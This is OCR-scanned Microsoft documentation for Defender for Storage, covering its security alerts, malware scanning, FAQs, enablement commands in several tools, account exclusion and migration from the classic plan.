e Learn about advanced configurations for malware scanning. 


Does this 
failed 
scanning 
Ir 
incura 
charge? 


Yes 


List of security threats and security 
alerts 
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Data security becomes a top priority as organizations shift data to cloud storage 
solutions like Azure Storage. This document outlines common security threats and risks 
associated with misconfigured settings and the security alerts Microsoft Defender for 
Storage provides to detect and respond to potential security threats. 


Security threats in cloud-based storage services 


Azure Storage is a widely used cloud storage solution, and like any cloud-based service, 
it is susceptible to various security threats. Common security threats in Azure Storage 


include: 


e Access token abuse and leakage 

e Lateral movement from compromised workloads 

e Compromised third-party partners with privileged permissions 
e Credentials theft 

e Reconnaissance with search engines 

e Data collection by blob hunting 

e Insider threats with existing permissions 


These threats can result in malware uploads, data corruption, and sensitive data 
exfiltration, posing significant risks. 


Access tokens 
leakage and 


abuse Lateral 


Insider 
F movement 
threats with 
ara from 
existing : 
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permissions 
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Compromised 
Collection by SO 
third-party 


blob hunting 


partners 


Recon with ' 
Credentials 


theft 


search 


engines 


In addition to security threats, configuration errors may inadvertently expose sensitive 


resources. Some common misconfiguration issues include: 


e Inadequate access controls and networking rules, leading to unintended data 
exposure on the internet 

e Insufficient authentication mechanisms 

e Lack of data encryption protocols for both data in transit and at rest 


To minimize the risk of security breaches and configuration errors, security teams 
employ a combination of posture management tools and workload protection tools. 
These tools ensure that Azure Storage remains secure by providing visibility into early 
signs of breaches, helping prevent attacks, and maintaining secure configurations. 


Microsoft security researchers have analyzed the attack surface of storage services. The 
potential security risks are described in the threat matrix for cloud-based storage 
services E, which are based on the MITRE ATT&CK® framework £, a knowledge base for 
the tactics and techniques employed in cyber-attacks. 


What kind of security alerts does Microsoft 
Defender for Storage provide? 


Q Tip 


For a comprehensive list of all Defender for Storage alerts, see the alerts reference 


guide page. This is useful for workload owners who want to know what threats can 


be detected and help SOC teams gain familiarity with detections before 


investigating them. Learn more about Defender for Cloud security alerts and how 


to respond to them. 


Security alerts are triggered in the following scenarios: 


Scenario 


Malicious content 
upload 


Sensitive data 
exposure event 


Suspicious activities 
on resources with 
sensitive data 


Compromised, 
misconfigured and 
unusual 
authentication 
tokens 


Data and 
permissions 
inspection 


Data exfiltration 
Data deletion 


Blob-hunting 
attempts 


Description 


Malware Scanning scans every blob uploaded to your storage accounts. It 
detects ransomware, viruses, spyware, and other malware uploaded to the 
storage account, helping you prevent it from entering the organization 
and spreading. The classic malware hash analysis alert operates differently 
from Malware Scanning. It compares the uploaded blob/file hash with a 
list of known malicious hash signatures rather than analyzing the file 
contents for malware. 


Detection of access level change allowing unauthenticated public access 
to blob containers with sensitive data from the internet 


Detection of suspicious activities occurring on blob containers containing 
sensitive data 


Detection of compromised SAS tokens used for data plane authentication 
and operations, and detection of unusual SAS tokens that can be 
generated by a malicious actor 


Detection of unusual exploration of the data and inspection of access 
permissions 


Detection of unusual extraction of data from storage accounts 
Detection of unusual deletions in storage accounts 


Detection of collection attempts by scanning and enumerating resources 
for publicly exposed storage resources. 


Scenario Description 


Read more on how to detect, investigate and prevent blob-hunting Z . 


Unusual access Detection of unusual access to storage accounts from unusual locations, 
patterns applications, and with unusual authentication 

Suspicious access Detection of known suspicious IP addresses by Microsoft Threat 
signatures Intelligence, known Tor exit nodes, and known suspicious applications 


Phishing campaigns Detection of phishing content hosted on storage accounts and identified 
as part of a phishing attack impacting Microsoft 365 users 


Security alerts include details of the suspicious activity, relevant investigation steps, 
remediation actions, and security recommendations. Alerts can be exported to Microsoft 
Sentinel or any other third-party SIEM/XDR tool. Learn more about how to stream alerts 
to a SIEM, SOAR, or IT Service Management solution. 


Understanding the differences between 
Malware Scanning and hash reputation 
analysis 


Defender for Storage offers two capabilities to detect malicious content uploaded to 
storage accounts: Malware Scanning (paid add-on feature available only on the new 
plan) and hash reputation analysis (available in all plans). 


Malware Scanning (paid add-on feature available only on 
the new plan) 


Malware Scanning leverages Microsoft Defender Antivirus (MDAV) to scan blobs 
uploaded to Blob storage, providing a comprehensive analysis that includes deep file 
scans and hash reputation analysis. This feature provides an enhanced level of detection 
against potential threats. 


Hash reputation analysis (available in all plans) 


Hash reputation analysis detects potential malware in Blob storage and Azure Files by 
comparing the hash values of newly uploaded blobs/files against those of known 
malware by Microsoft Threat Intelligence Z. Not all file protocols and operation types 
are supported with this capability, leading to some operations not being monitored for 
potential malware uploads. Unsupported use cases include SMB file shares and when a 
blob is created using Put Blockand Put Block List. 


In summary, Malware Scanning, which is only available on the new plan for Blob storage, 
offers a more comprehensive approach to malware detection by analyzing the full 
content of files and incorporating hash reputation analysis in its scanning methodology. 


Next steps 


In this article, you learned about Microsoft Defender for Storage. 


Enable Defender for Storage 


Common questions about 
Defender for Storage 


FAQ 


Get answers to common questions about Microsoft Defender for Storage. 


Is it possible to enable Defender for 
Storage on a resource level? 


Yes, it's possible to enable Defender for Storage at the resource level and set up 
Malware Scanning and Sensitivity Scanning accordingly. Keep in mind that enabling it at 
the subscription level is the recommended approach, as it will automatically protect all 
new storage accounts. 

Can | exclude certain storage accounts 
from protection? 


Yes, you can exclude storage accounts from protection. 


How long does it take for subscription- 
level enablement to take effect? 

Enabling Defender for Storage at the subscription level may take up to 24 hours to be 
fully enabled across all storage accounts. 

Is there a difference in features between 
the new and Defender for Storage 
(classic)? 


Yes, there's a difference in the capabilities of the two plans. New and future security 
capabilities will only be available in the new Defender for Storage plan. If you want to 
access these new capabilities, you need to enable the new plan. 


Will the Defender for Storage (classic) 
continue to be supported? 


The Defender for Storage (classic) will still continue to be supported for three years after 
the release of the new Defender for Storage to general availability (GA). 


Can I switch back to the Defender for 
Storage (classic)? 


Yes, you can use the REST API to return to the Defender for Storage (classic) plan. 


If you want to switch back to the Defender for Storage (classic) plan, you need to do two 
things. First, disable the new Defender for Storage plan that is enabled now. Second, 
check if there are any policies that can re-enable the new plan and turn them off too. 
The two Azure built-in policies enabling the new plan are Configure Microsoft Defender 
for Storage to be enabled and Configure basic Microsoft Defender for Storage to be 
enabled (Activity Monitoring only). 


How can | calculate the cost of each 
plan? 


To estimate the cost of Defender for Storage, we've provided a pricing estimation 
workbook and a PowerShell script that you can run in your environment. You can also 
check out the Defender for Cloud pricing page Z for more information. 


How does Defender for Storage monitor 
Storage accounts? 


Defender for storage uses Azure Event Grid to monitor the storage account activity. This 
is result in creation of an Azure Event Grid System topic with the name 
<StorageAccountName>-<Guid> in the same resource group as the storage account. It 
will also create an Event Grid Subscription resource named 
StorageAntimalwareSubscription. 


Next steps 


Learn more about Defender for Storage 


Overview of Microsoft Defender for 
Storage (classic) 
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© Note 


Upgrade to the new Microsoft Defender for Storage plan. It includes new features 
like Malware Scanning and Sensitive Data Threat Detection. This plan also provides 
a more predictable pricing structure for better control over coverage and costs. 
Additionally, all new Defender for Storage features will only be released in the new 
plan. Migrating to the new plan is a simple process, read here about how to 
migrate from the classic plan. If you're using Defender for Storage (classic) with 
per-transaction or per-storage account pricing, you'll need to migrate to the new 
Defender for Storage (classic) plan to access these features and pricing. Learn about 
the benefits of migrating to the new Defender for Storage plan. 


Microsoft Defender for Storage (classic) is an Azure-native layer of security intelligence 
that detects unusual and potentially harmful attempts to access or exploit your storage 
accounts. It uses advanced threat detection capabilities and Microsoft Threat 
Intelligence” data to provide contextual security alerts. Those alerts also include steps 
to mitigate the detected threats and prevent future attacks. 


You can enable Microsoft Defender for Storage (classic) at either the subscription level 
(recommended) or the resource level. 


Defender for Storage (classic) continually analyzes the data stream generated by the 
Azure Blob Storage , Azure Files“, and Azure Data Lake Storage“ services. When 
potentially malicious activities are detected, security alerts are generated. These alerts 
are displayed in Microsoft Defender for Cloud. Any details of suspicious activity along 
with the relevant investigation steps, remediation actions, and security 
recommendations are presented here. 


Analyzed data of Azure Blob Storage includes operation types such as Get Blob, Put 
Blob, Get Container ACL, List Blobs, and Get Blob Properties. Examples of analyzed 
Azure Files operation types include Get File, Create File, List Files, Get File 


Properties, and Put Range. 


Defender for Storage (classic) doesn't access the Storage account data and has no effect 
on its performance. 


You can learn more by watching this video from the Defender for Cloud in the Field 
video series: 


e Defender for Storage (classic) in the field 


For more clarification about Defender for Storage (classic), see the commonly asked 
questions. 


Availability 


Aspect Details 

Release state: General availability (GA) 

Pricing: Microsoft Defender for Storage (classic) is billed as shown on the pricing 
page E 


Protected storage Blob Storage Z (Standard/Premium StorageV2, Block Blobs) 
types: Azure Files (over REST API and SMB) 
Azure Data Lake Storage Gen2 (Standard/Premium accounts with 
hierarchical namespaces enabled) 


Clouds: Lv] Commercial clouds 
Lv] Azure Government 
* Microsoft Azure operated by 21Vianet 
* Connected AWS accounts 


What are the benefits of Microsoft Defender 
for Storage (classic)? 


Defender for Storage (classic) provides: 


e Azure-native security - With 1-click enablement, Defender for Storage (classic) 
protects data stored in Azure Blob, Azure Files, and Data Lakes. As an Azure-native 
service, Defender for Storage (classic) provides centralized security across all data 
assets that Azure manages and is integrated with other Azure security services 
such as Microsoft Sentinel. 


e Rich detection suite - Powered by Microsoft Threat Intelligence, the detections in 
Defender for Storage (classic) cover the top storage threats such as 
unauthenticated access, compromised credentials, social engineering attacks, data 
exfiltration, privilege abuse, and malicious content. 


e Response at scale - Defender for Cloud's automation tools make it easier to 


prevent and respond to identified threats. Learn more in Automate responses to 


Defender for Cloud triggers. 
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Security threats in cloud-based storage services 


Microsoft security researchers have analyzed the attack surface of storage services. 


Storage accounts can be subject to data corruption, exposure of sensitive content, 


malicious content distribution, data exfiltration, unauthorized access, and more. 


The potential security risks are described in the threat matrix for cloud-based storage 
services and are based on the MITRE ATT&CK® framework Z , a knowledge base for 


the tactics and techniques employed in cyberattacks. 
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What kind of alerts does Microsoft Defender 
for Storage (classic) provide? 


Security alerts are triggered for the following scenarios (typically from 1-2 hours after 
the event): 


Type of threat Description 


Unusual access to For example, access from a TOR exit node, suspicious IP addresses, unusual 
an account applications, unusual locations, and anonymous access without 
authentication. 


Unusual behavior Behavior that deviates from a learned baseline. For example, a change of 
in an account access permissions in an account, unusual access inspection, unusual data 
exploration, unusual deletion of blobs/files, or unusual data extraction. 


Hash reputation Detection of known malware based on full blob/file hash. Which can help 

based Malware detect ransomware, viruses, spyware, and other malware uploaded to an 

detection account, prevent it from entering the organization, and spreading to more 
users and resources. See also Limitations of hash reputation analysis. 


Unusual file Unusual cloud service packages and executable files that have been 
uploads uploaded to an account. 
Public visibility Potential break-in attempts by scanning containers and pulling potentially 


sensitive data from publicly accessible containers. 


Phishing When content that's hosted on Azure Storage is identified as part of a 
campaigns phishing attack that's impacting Microsoft 365 users. 
Ọ Tip 


For a comprehensive list of all Defender for Storage (classic) alerts, see the alerts 
reference page. It is essential to review the prerequisites, as certain security alerts 
are only accessible under the new Defender for Storage plan. The information in 
the reference page is beneficial for workload owners seeking to understand 
detectable threats and enables Security Operations Center (SOC) teams to 
familiarize themselves with detections prior to conducting investigations. Learn 
more about what's in a Defender for Cloud security alert, and how to manage your 
alerts in Manage and respond to security alerts in Microsoft Defender for Cloud. 


Alerts include details of the incident that triggered them, and recommendations on how 
to investigate and remediate threats. Alerts can be exported to Microsoft Sentinel or any 


other third-party SIEM or any other external tool. Learn more in Stream alerts to a SIEM, 
SOAR, or IT classic deployment model solution. 


Limitations of hash reputation analysis 


Q Tip 


If you're looking to have your uploaded blobs scanned for malware in near real- 
time, we recommend that you upgrade to the new Defender for Storage plan. Learn 
more about Malware Scanning. 


e Hash reputation isn't deep file inspection - Microsoft Defender for Storage 
(classic) uses hash reputation analysis supported by Microsoft Threat Intelligence E 
to determine whether an uploaded file is suspicious. The threat protection tools 
don't scan the uploaded files; rather they analyze the data generated from the 
Blobs Storage and Files services. Defender for Storage (classic) then compares the 
hashes of newly uploaded files with hashes of known viruses, trojans, spyware, and 


ransomware. 


e Hash reputation analysis isn't supported for all files protocols and operation 
types - Some, but not all, of the data logs contain the hash value of the related 
blob or file. In some cases, the data doesn't contain a hash value. As a result, some 
operations can't be monitored for known malware uploads. Examples of such 
unsupported use cases include SMB file-shares and when a blob is created using 
Put Block and Put blocklist. 


Next steps 
In this article, you learned about Microsoft Defender for Storage (classic). 


e Enable Defender for Storage (classic) 
e Check out common questions about Defender for Storage classic. 


Enable Microsoft Defender for Storage 
(classic) 
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This article explains how you can enable and configure Microsoft Defender for Storage 
(Classic) on your subscriptions by using various templates such as PowerShell, REST API, 
and others. 


You can also upgrade to the new Microsoft Defender for Storage plan and use advanced 
security capabilities, including Malware Scanning and sensitive data threat detection. 
Benefit from a more predictable and granular pricing structure that charges per storage 
account, with extra costs for high-volume transactions. This new pricing plan also 
encompasses all new security features and detections. 


O Note 


If you're using Defender for Storage (classic) with per-transaction or per-storage 
account pricing, you'll need to migrate to the new Defender for Storage plan to 
access these features and pricing. Learn about migrating to the new Defender for 
Storage plan. 


Microsoft Defender for Storage is an Azure-native layer of security intelligence that 
detects unusual and potentially harmful attempts to access or exploit your storage 
accounts. It uses advanced threat detection capabilities and Microsoft Threat 
Intelligence rz data to provide contextual security alerts. Those alerts also include steps 
to mitigate the detected threats and prevent future attacks. 


Microsoft Defender for Storage continuously analyzes the transactions of Azure Blob 
Storage’, Azure Data Lake Storage“, and Azure Files £ services. When potentially 
malicious activities are detected, security alerts are generated. Alerts are shown in 
Microsoft Defender for Cloud with the details of the suspicious activity, appropriate 


investigation steps, remediation actions, and security recommendations. 


Analyzed telemetry of Azure Blob Storage includes operation types such as Get Blob, Put 
Blob, Get Container ACL, List Blobs, and Get Blob Properties. Examples of analyzed Azure 
Files operation types include Get File, Create File, List Files, Get File Properties, and Put 
Range. 


Defender for Storage classic doesn’t access the Storage account data and has no impact 
on its performance. 


Learn more about the benefits, features, and limitations of Defender for Storage. You 
can also learn more about Defender for Storage in the Defender for Storage episode of 
the Defender for Cloud in the Field video series. 


Availability 


Aspect Details 
Release state: General availability (GA) 
Pricing: Microsoft Defender for Storage is billed as shown in the pricing details 2 


and in the Defender plans Z in the Azure portal 


Protected storage Blob Storage (Standard/Premium StorageV2, Block Blobs) 

types: Azure Files (over REST API and SMB) 
Azure Data Lake Storage Gen2 (Standard/Premium accounts with hierarchical 
namespaces enabled) 


Clouds: OO Commercial clouds 


© Azure Government (Only for per-transaction plan) 
x 


Microsoft Azure operated by 21Vianet 
* Connected AWS accounts 


Set up Microsoft Defender for Storage (classic) 


Set up per-transaction pricing for a subscription 


For the Defender for Storage per-transaction pricing, we recommend that you enable 
Defender for Storage for each subscription so that all existing and new storage accounts 
are protected. If you want to only protect specific accounts, configure Defender for 
Storage for each account. 


You can configure Microsoft Defender for Storage on your subscriptions in several ways: 


e Terraform template 
e Bicep template 

e ARM template 

e PowerShell 

e Azure CLI 

e REST API 


Terraform template 


To enable Microsoft Defender for Storage at the subscription level with per-transaction 


pricing using a Terraform template, add this code snippet to your template with your 
subscription ID as the parent_id value: 


Terraform 


resource “azapi_resource" "“symbolicname” { 
type = "Microsoft.Security/pricings@2022-03-01" 
name = "StorageAccounts" 
parent_id = "<subscriptionId>" 
body = jsonencode({ 
properties = { 
pricingTier = "Standard" 
subPlan = "PerTransaction" 


}) 


To disable the plan, set the pricingTier property value to Free and remove the subPlan 
property. 


Learn more about the ARM template AzAPI reference. 


Bicep template 


To enable Microsoft Defender for Storage at the subscription level with per-transaction 
pricing using Bicep, add the following to your Bicep template: 


Bicep 


resource symbolicname 'Microsoft.Security/pricings@2022-03-01' = { 
name: 'StorageAccounts' 
properties: { 
pricingTier: 'Standard' 
subPlan: 'PerTransaction' 


To disable the plan, set the pricingTier property value to Free and remove the subPlan 
property. 


Learn more about the Bicep template AzAPI reference. 


ARM template 


To enable Microsoft Defender for Storage at the subscription level with per-transaction 
pricing using an ARM template, add this JSON snippet to the resources section of your 
ARM template: 


JSON 
{ 
"type": "Microsoft.Security/pricings", 
"apiVersion": "2022-03-01", 
"name": "StorageAccounts", 
"properties": { 
"pricingTier": "Standard", 
"subPlan": "PerTransaction" 
} 
} 


To disable the plan, set the pricingTier property value to Free and remove the subPlan 


property. 


Learn more about the ARM template AzAPI reference. 


PowerShell 


To enable Microsoft Defender for Storage at the subscription level with per-transaction 
pricing using PowerShell: 


1. If you don't have it already, install the Azure Az PowerShell module. 


2. Use the Connect-AzAccount cmdlet to sign in to your Azure account. Learn more 


about signing in to Azure with Azure PowerShell. 


3. Use these commands to register your subscription to the Microsoft Defender for 
Cloud Resource Provider: 


PowerShell 


Set-AzContext -Subscription <subscriptionId> 
Register-AzResourceProvider -ProviderNamespace 'Microsoft.Security ' 


Replace <subscriptionId> with your subscription ID. 


4. Enable Microsoft Defender for Storage for your subscription with the Set- 


AzSecurityPricing cmdlet: 


PowerShell 


Set-AzSecurityPricing -Name "StorageAccounts" -PricingTier "Standard" 


Ọ Tip 
You can use the GetAzSecurityPricing (Az_Security) to see all of the Defender for 
Cloud plans that are enabled for the subscription. 

To disable the plan, set the -PricingTier property value to Free. 


Learn more about the using PowerShell with Microsoft Defender for Cloud. 


Azure CLI 


To enable Microsoft Defender for Storage at the subscription level with per-transaction 


pricing using Azure CLI: 
1. If you don't have it already, install the Azure CLI. 


2. Use the az login command to sign in to your Azure account. Learn more about 


signing in to Azure with Azure CLI. 
3. Use these commands to set the subscription ID and name: 
Azure CLI 


az account set --subscription "<subscriptionId or name>" 


Replace <subscriptionId> with your subscription ID. 


4. Enable Microsoft Defender for Storage for your subscription with the az security 


pricing create Command: 


Azure CLI 


az security pricing create -n StorageAccounts --tier "standard" 


Q Tip 


You can use the az security pricing show command to see all of the Defender for 


Cloud plans that are enabled for the subscription. 


To disable the plan, set the -tier property value to free. 


Learn more about the az security pricing create command. 


REST API 


To enable Microsoft Defender for Storage at the subscription level with per-transaction 
pricing using the Microsoft Defender for Cloud REST API, create a PUT request with this 
endpoint and body: 


HTTP 


PUT 
https: //management.azure.com/subscriptions/{subscriptionId}/providers/Micros 
oft.Security/pricings/StorageAccounts ?api-version=2022-03-01 


{ 

"properties": { 
"pricingTier": "Standard", 
"subPlan": "PerTransaction" 
} 

} 


Replace {subscriptionId} with your subscription ID. 


To disable the plan, set the -pricingTier property value to Free and remove the 


subPlan parameter. 


Learn more about the updating Defender plans with the REST API in HTTP, Java, Go and 


JavaScript. 


Set up per-transaction pricing for a storage account 


You can configure Microsoft Defender for Storage with per-transaction pricing on your 


accounts in several ways: 


e ARM template 
e PowerShell 
e Azure CLI 


ARM template 


To enable Microsoft Defender for Storage for a specific storage account with per- 
transaction pricing using an ARM template, use the prepared Azure template”. 


If you want to disable Defender for Storage on the account: 


1. Sign in to the Azure portal £. 

2. Navigate to your storage account. 

3. In the Security + networking section of the Storage account menu, select 
Microsoft Defender for Cloud. 

4. Select Disable. 


PowerShell 


To enable Microsoft Defender for Storage for a specific storage account with per- 
transaction pricing using PowerShell: 


1. If you don't have it already, install the Azure Az PowerShell module. 


2. Use the Connect-AzAccountcmdlet to sign in to your Azure account. Learn more 
about signing in to Azure with Azure PowerShell. 


3. Enable Microsoft Defender for Storage for the desired storage account with 
the Enable-AzSecurityAdvancedThreatProtection cmdlet: 


PowerShell 
Enable-AzSecurityAdvancedThreatProtection -Resourceld 


"/subscriptions/<subscription-id>/resourceGroups/<resource- 
group>/providers/Microsoft.Storage/storageAccounts/<storage-account>/" 


Replace <subscriptionId>, <resource-group>, and <storage-account> with the 


values for your environment. 


If you want to disable per-transaction pricing for a specific storage account, use the 
Disable-AzSecurityAdvancedThreatProtection cmdlet: 


PowerShell 


Disable-AzSecurityAdvancedThreatProtection -Resourceld 
"/subscriptions/<subscription-id>/resourceGroups/<resource- 
group>/providers/Microsoft.Storage/storageAccounts/<storage-account>/" 


Learn more about the using PowerShell with Microsoft Defender for Cloud. 


Azure CLI 


To enable Microsoft Defender for Storage for a specific storage account with per- 
transaction pricing using Azure CLI: 


1. If you don't have it already, install the Azure CLI. 


2. Use the az login command to sign in to your Azure account. Learn more about 


signing in to Azure with Azure CLI. 


3. Enable Microsoft Defender for Storage for your subscription with the az security 
atp storage update command: 


Azure CLI 


az security atp storage update \ 
--resource-group <resource-group> \ 
--storage-account <storage-account> \ 
--is-enabled true 


Q Tip 


You can use the az security atp storage show command to see if Defender for 
Storage is enabled on an account. 


To disable Microsoft Defender for Storage for your subscription, use the az security atp 
storage update command: 


Azure CLI 


az security atp storage update \ 
--resource-group <resource-group> \ 
--storage-account <storage-account> \ 
--is-enabled false 


Learn more about the az security atp storage command. 


Exclude a storage account from a protected 
subscription in the per-transaction plan 


When you enable Microsoft Defender for Storage on a subscription for the per- 
transaction pricing, all current and future Azure Storage accounts in that subscription 
are protected. You can exclude specific storage accounts from the Defender for Storage 
protections using the Azure portal, PowerShell, or the Azure CLI. 


We recommend that you enable Defender for Storage on the entire subscription to 
protect all existing and future storage accounts in it. However, there are some cases 
where people want to exclude specific storage accounts from Defender protection. 


Exclusion of storage accounts from protected subscriptions requires you to: 


1. Add a tag to block inheriting the subscription enablement. 
2. Disable Defender for Storage (classic). 


O Note 


Consider upgrading to the new Defender for Storage plan if you have storage 
accounts you would like to exclude from the Defender for Storage classic plan. Not 
only will you save on costs for transaction-heavy accounts, but you'll also gain 
access to enhanced security features. Learn more about the benefits of migrating 
to the new plan. 


Excluded storage accounts in the Defender for Storage classic are not automatically 
excluded when you migrate to the new plan. 


Exclude an Azure Storage account protection on a 
subscription with per-transaction pricing 


To exclude an Azure Storage account from Microsoft Defender for Storage (classic), you 
can use: 


e PowerShell 
e Azure CLI 


Use PowerShell to exclude an Azure Storage account 


1. If you don't have the Azure Az PowerShell module installed, install it using the 
instructions from the Azure PowerShell documentation. 


2. Using an authenticated account, connect to Azure with the Connect-AzAccount 


cmdlet, as explained in Sign in with Azure PowerShell. 


3. Define the AzDefenderPlanAutoEnable tag on the storage account with the 
Update-AzTag cmdlet (replace the Resourceld with the resource ID of the relevant 


storage account): 


Azure PowerShell 


Update-AzTag -ResourcelId <resourceID> -Tag @{"AzDefenderPlanAutoEnable" 
= "off"} -Operation Merge 


If you skip this stage, your untagged resources continue receiving daily updates 
from the subscription level enablement policy. That policy enables Defender for 
Storage again on the account. Learn more about tags in Use tags to organize your 
Azure resources and management hierarchy. 


4. Disable Microsoft Defender for Storage for the desired account on the relevant 
subscription with the Disable-AzSecurityAdvancedThreatProtection cmdlet (using 


the same resource ID): 


Azure PowerShell 


Disable-AzSecurityAdvancedThreatProtection -ResourcelId <resourcelId> 


Learn more about this cmdlet. 


Use Azure CLI to exclude an Azure Storage account 


1. If you don't have Azure CLI installed, install it using the instructions from the Azure 


CLI documentation. 


2. Using an authenticated account, connect to Azure with the login command as 
explained in Sign in with Azure CLI and enter your account credentials when 


prompted: 
Azure CLI 
az login 
3. Define the AzDefenderPlanAutoEnable tag on the storage account with the tag 


update command (replace the Resourceld with the resource ID of the relevant 


storage account): 


Azure CLI 


az tag update --resource-id MyResourceld --operation merge --tags 
AzDefenderPlanAutoEnable=ofFf 


If you skip this stage, your untagged resources continue receiving daily updates 
from the subscription level enablement policy. That policy enables Defender for 


Storage again on the account. 


Tip 
Learn more about tags in az tag. 


4. Disable Microsoft Defender for Storage for the desired account on the relevant 
subscription with the security atp storage command (using the same resource 


ID): 
Azure CLI 


az security atp storage update --resource-group MyResourceGroup -- 
storage-account MyStorageAccount --is-enabled false 


Learn more about this command. 


Exclude an Azure Databricks Storage account 


Exclude an active Databricks workspace 


Microsoft Defender for Storage can exclude specific active Databricks workspace storage 
accounts, when the plan is already enabled on a subscription. 


To exclude an active Databricks workspace: 
1. Sign in to the Azure portal £. 
2. Navigate to Azure Databricks > Your Databricks workspace > Tags. 
3. In the Name field, enter AzDefenderPlanAutoEnable. 


4. In the Value field, enter off and then select Apply. 


Home > Demo > demo-databricks-workspace 


demo | Tags 2 = x 


Azure Databricks Service 


E Search (Ctrl+/) | « E Delete all 


Sa Overview 
Tags are name/value pairs that enable you to categorize resources and view consolidated 
E Activity log billing by applying the same tag to multiple resources and resource groups. Tag names are 
g 


case insensitive, but tag values are case sensitive.Learn more about tags? 
Eo Access control (IAM) 
Do not enter names or values that could make your resources less secure or that contain 


@ Tags personal/sensitive information because tag data will be replicated globally. 


Settings Name © Value © 


<> Virtual Network Peerings AzDefenderPlanAutoEnable : E O 


= Properties 


A Locks 


g demo (Azure Databricks Service) 
1 to be added © 


Automation 
du Tasks (preview) 


& Export template 


Support + troubleshooting 


E New Support Request eae Discard changes 


5. Navigate to Microsoft Defender for Cloud > Environment settings > Your 


subscription. 


6. Turn the Defender for Storage plan to Off and select Save. 


17) Settings | Defender plans 


Contoso Dev_EUS 


| P Search (Ctrl+/) « 


Settings Microsoft Defender for Resources Plan 

2 Auto provisioning du App Service 0 instances ZE of ) 
@ Email notifications E, Azure SQL Databases 0 servers 4 On xD 
© integrations E sal servers on machines 9 servers ( on off )) 
TA Workflow automation Open-source relational databe 9 servers Co Sm 


E Continuous export 


= Storage 2 storage accounts 


Policy settings GO Containers 0 container registries; 0... 


7. Re-enable Defender for Storage (classic) using one of the supported methods (you 
can't enable Defender for Storage classic from the Azure portal). 


The tags are inherited by the Storage account of the Databricks workspace and prevent 
Defender for Storage from turning on. 


© Note 


Tags can't be added directly to the Databricks Storage account, or its Managed 


Resource Group. 


Prevent autoenabling on a new Databricks workspace storage 
account 


When you create a new Databricks workspace, you have the ability to add a tag that 
prevents your Microsoft Defender for Storage account from enabling automatically. 


To prevent auto-enabling on a new Databricks workspace storage account: 
1. Follow these steps to create a new Azure Databricks workspace. 


2. In the Tags tab, enter a tag named AzDefenderPlanAutoEnable. 
3. Enter the value off. 


Home > Azure Databricks 


Create an Azure Databricks workspace 


Basics Networking Advanced Tags Review + create 


Name © Value © Resource 


AzDefenderPlanAutoEnable d Off Azure Databricks Service DI 


| Azure Databricks Service 


4. Continue following the instructions to create your new Azure Databricks 


workspace. 


The Microsoft Defender for Storage account inherits the tag of the Databricks 
workspace, which prevents Defender for Storage from turning on automatically. 


Next steps 


e Check out the alerts for Azure Storage 
e Learn about the features and benefits of Defender for Storage 


e Check out common questions about Defender for Storage classic. 


Migrate from Defender for Storage 
(classic) to the new plan 


Article e 08/29/2023 


The new Defender for Storage plan was launched on March 28, 2023. If you're currently 
using Microsoft Defender for Storage (classic) with the per-transaction or the per- 
storage account pricing plan, consider upgrading to the new Defender for Storage plan, 
which offers several new benefits that aren't included in the classic plan. 


Why move to the new plan? 


The new plan includes advanced security capabilities to help protect against malicious 
file uploads, sensitive data exfiltration, and data corruption. 


The new plan also provides a more predictable and flexible pricing structure for better 


control over coverage and costs. 


The new pricing plan charges based on the number of storage accounts you protect, 
which simplifies cost calculations and allows for easy scaling as your needs change. You 
can enable it at the subscription or resource level and can also exclude specific storage 
accounts from protected subscriptions, providing more granular control over your 
security coverage. Extra charges may apply to storage accounts with high-volume 
transactions that exceed a high monthly threshold. 


Deprecation of Defender for Storage (classic) 
The classic plan will be deprecated in the future, and the deprecation will be announced 
three years in advance. All future capabilities will only be added to the new plan. 

© Note 


If you already have the legacy Defender for Storage (classic) enabled and want to 
access the new security features and pricing, you'll need to proactively migrate to 
the new plan. You can migrate to the new plan with one-click through the Azure 
Portal or use Azure Policy and laC tools. 


Migration scenarios 


Migrating from the classic Defender for Storage plan to the new Defender for Storage 
plan is a straightforward process, and there are several ways to do it. You'll need to 
proactively enable the new plan to access its enhanced capabilities and pricing. 


© Note 


To enable the new plan, make sure to disable the old Defender for Storage policies. 
Look for and disable policies named "Configure Azure Defender for Storage to be 
enabled", "Azure Defender for Storage should be enabled", or “Configure Microsoft 
Defender for Storage to be enabled (per-storage account plan)". 


Migrating from the classic Defender for Storage plan 
enabled with per-transaction pricing 


If the classic Defender for Storage plan is enabled with per-transaction pricing, you can 
switch to the new plan at either the subscription or resource level. You can also exclude 
specific storage accounts from protected subscriptions. 


Storage accounts that were previously excluded from protected subscriptions in the per- 
transaction plan will not remain excluded when you switch to the new plan. However, 
the exclusion tags will remain on the resource and can be removed. In most cases, 
storage accounts that were previously excluded from protected subscriptions will 
benefit the most from the new pricing plan. 


Migrating from the classic Defender for Storage plan 
enabled with per-storage account pricing 


If the classic Defender for Storage plan is enabled with per-storage account pricing, you 
can switch to the new plan at either the subscription or resource level. The new 
Defender for Storage plan has the same pricing plan with the exception of malware 
scanning which may incur extra charges and is billed per GB scanned. 


You can learn more about Defender for Storage's pricing model on the Defender for 
Cloud pricing page”. 


You can also exclude specific storage accounts from protected subscriptions. 


Identify active Microsoft Defender for Storage 
pricing plans on your subscriptions 


If you're looking to quickly identify which pricing plans are active on your subscriptions, 
utilizing this Coverage workbook” based on Azure Resource Graph (ARG) Explorer Z 
(with the ‘securityresources’ table) data is a great solution. This tool allows you to 
simplify and analyze your enablement status easily. 


© Note 


The Coverage workbook and ARG Explorer query only provide enablement status 
when Defender for Storage is enabled at the subscription level. For storage 
accounts with Defender for Storage enabled at the resource level, the enablement 
status can be found within the Defender for Cloud blade of the storage accounts in 
the Azure portal. Additionally, the enablement status can be queried with a 
PowerShell script. 


Plan comparison 


To help you better understand the differences between the classic plan and the new 
plan, here's a comparison table: 


Category New Defender for Classic (per- Classic (per- 
Storage plan transaction storage account 

plan) plan) 

Pricing structure Cost is based on the Cost is based on Cost is based on 
number of storage the number of the number of 
accounts you protect*. transactions storage accounts 
Add-on costs for GB processed you protect* 
scanned for malware, if 
enabled 

Enablement options Subscription and Subscription and Subscription only 
resource level resource level 

Exclusion of storage Yes Yes No 

accounts from protected 

subscriptions 

Activity monitoring Yes Yes Yes 

(security alerts) 

Malware scanning in Yes (add-on) No (only hash- No (only hash- 

uploaded Blobs reputation reputation 


analysis) analysis) 


Category New Defender for Classic (per- Classic (per- 


Storage plan transaction storage account 
plan) plan) 
Sensitive data threat Yes (add-on) No No 
detection 
Detection of Yes No No 


leaked/compromised SAS 
tokens (entities without 
identities) 


* extra charges may apply to storage accounts with high-volume transactions. 


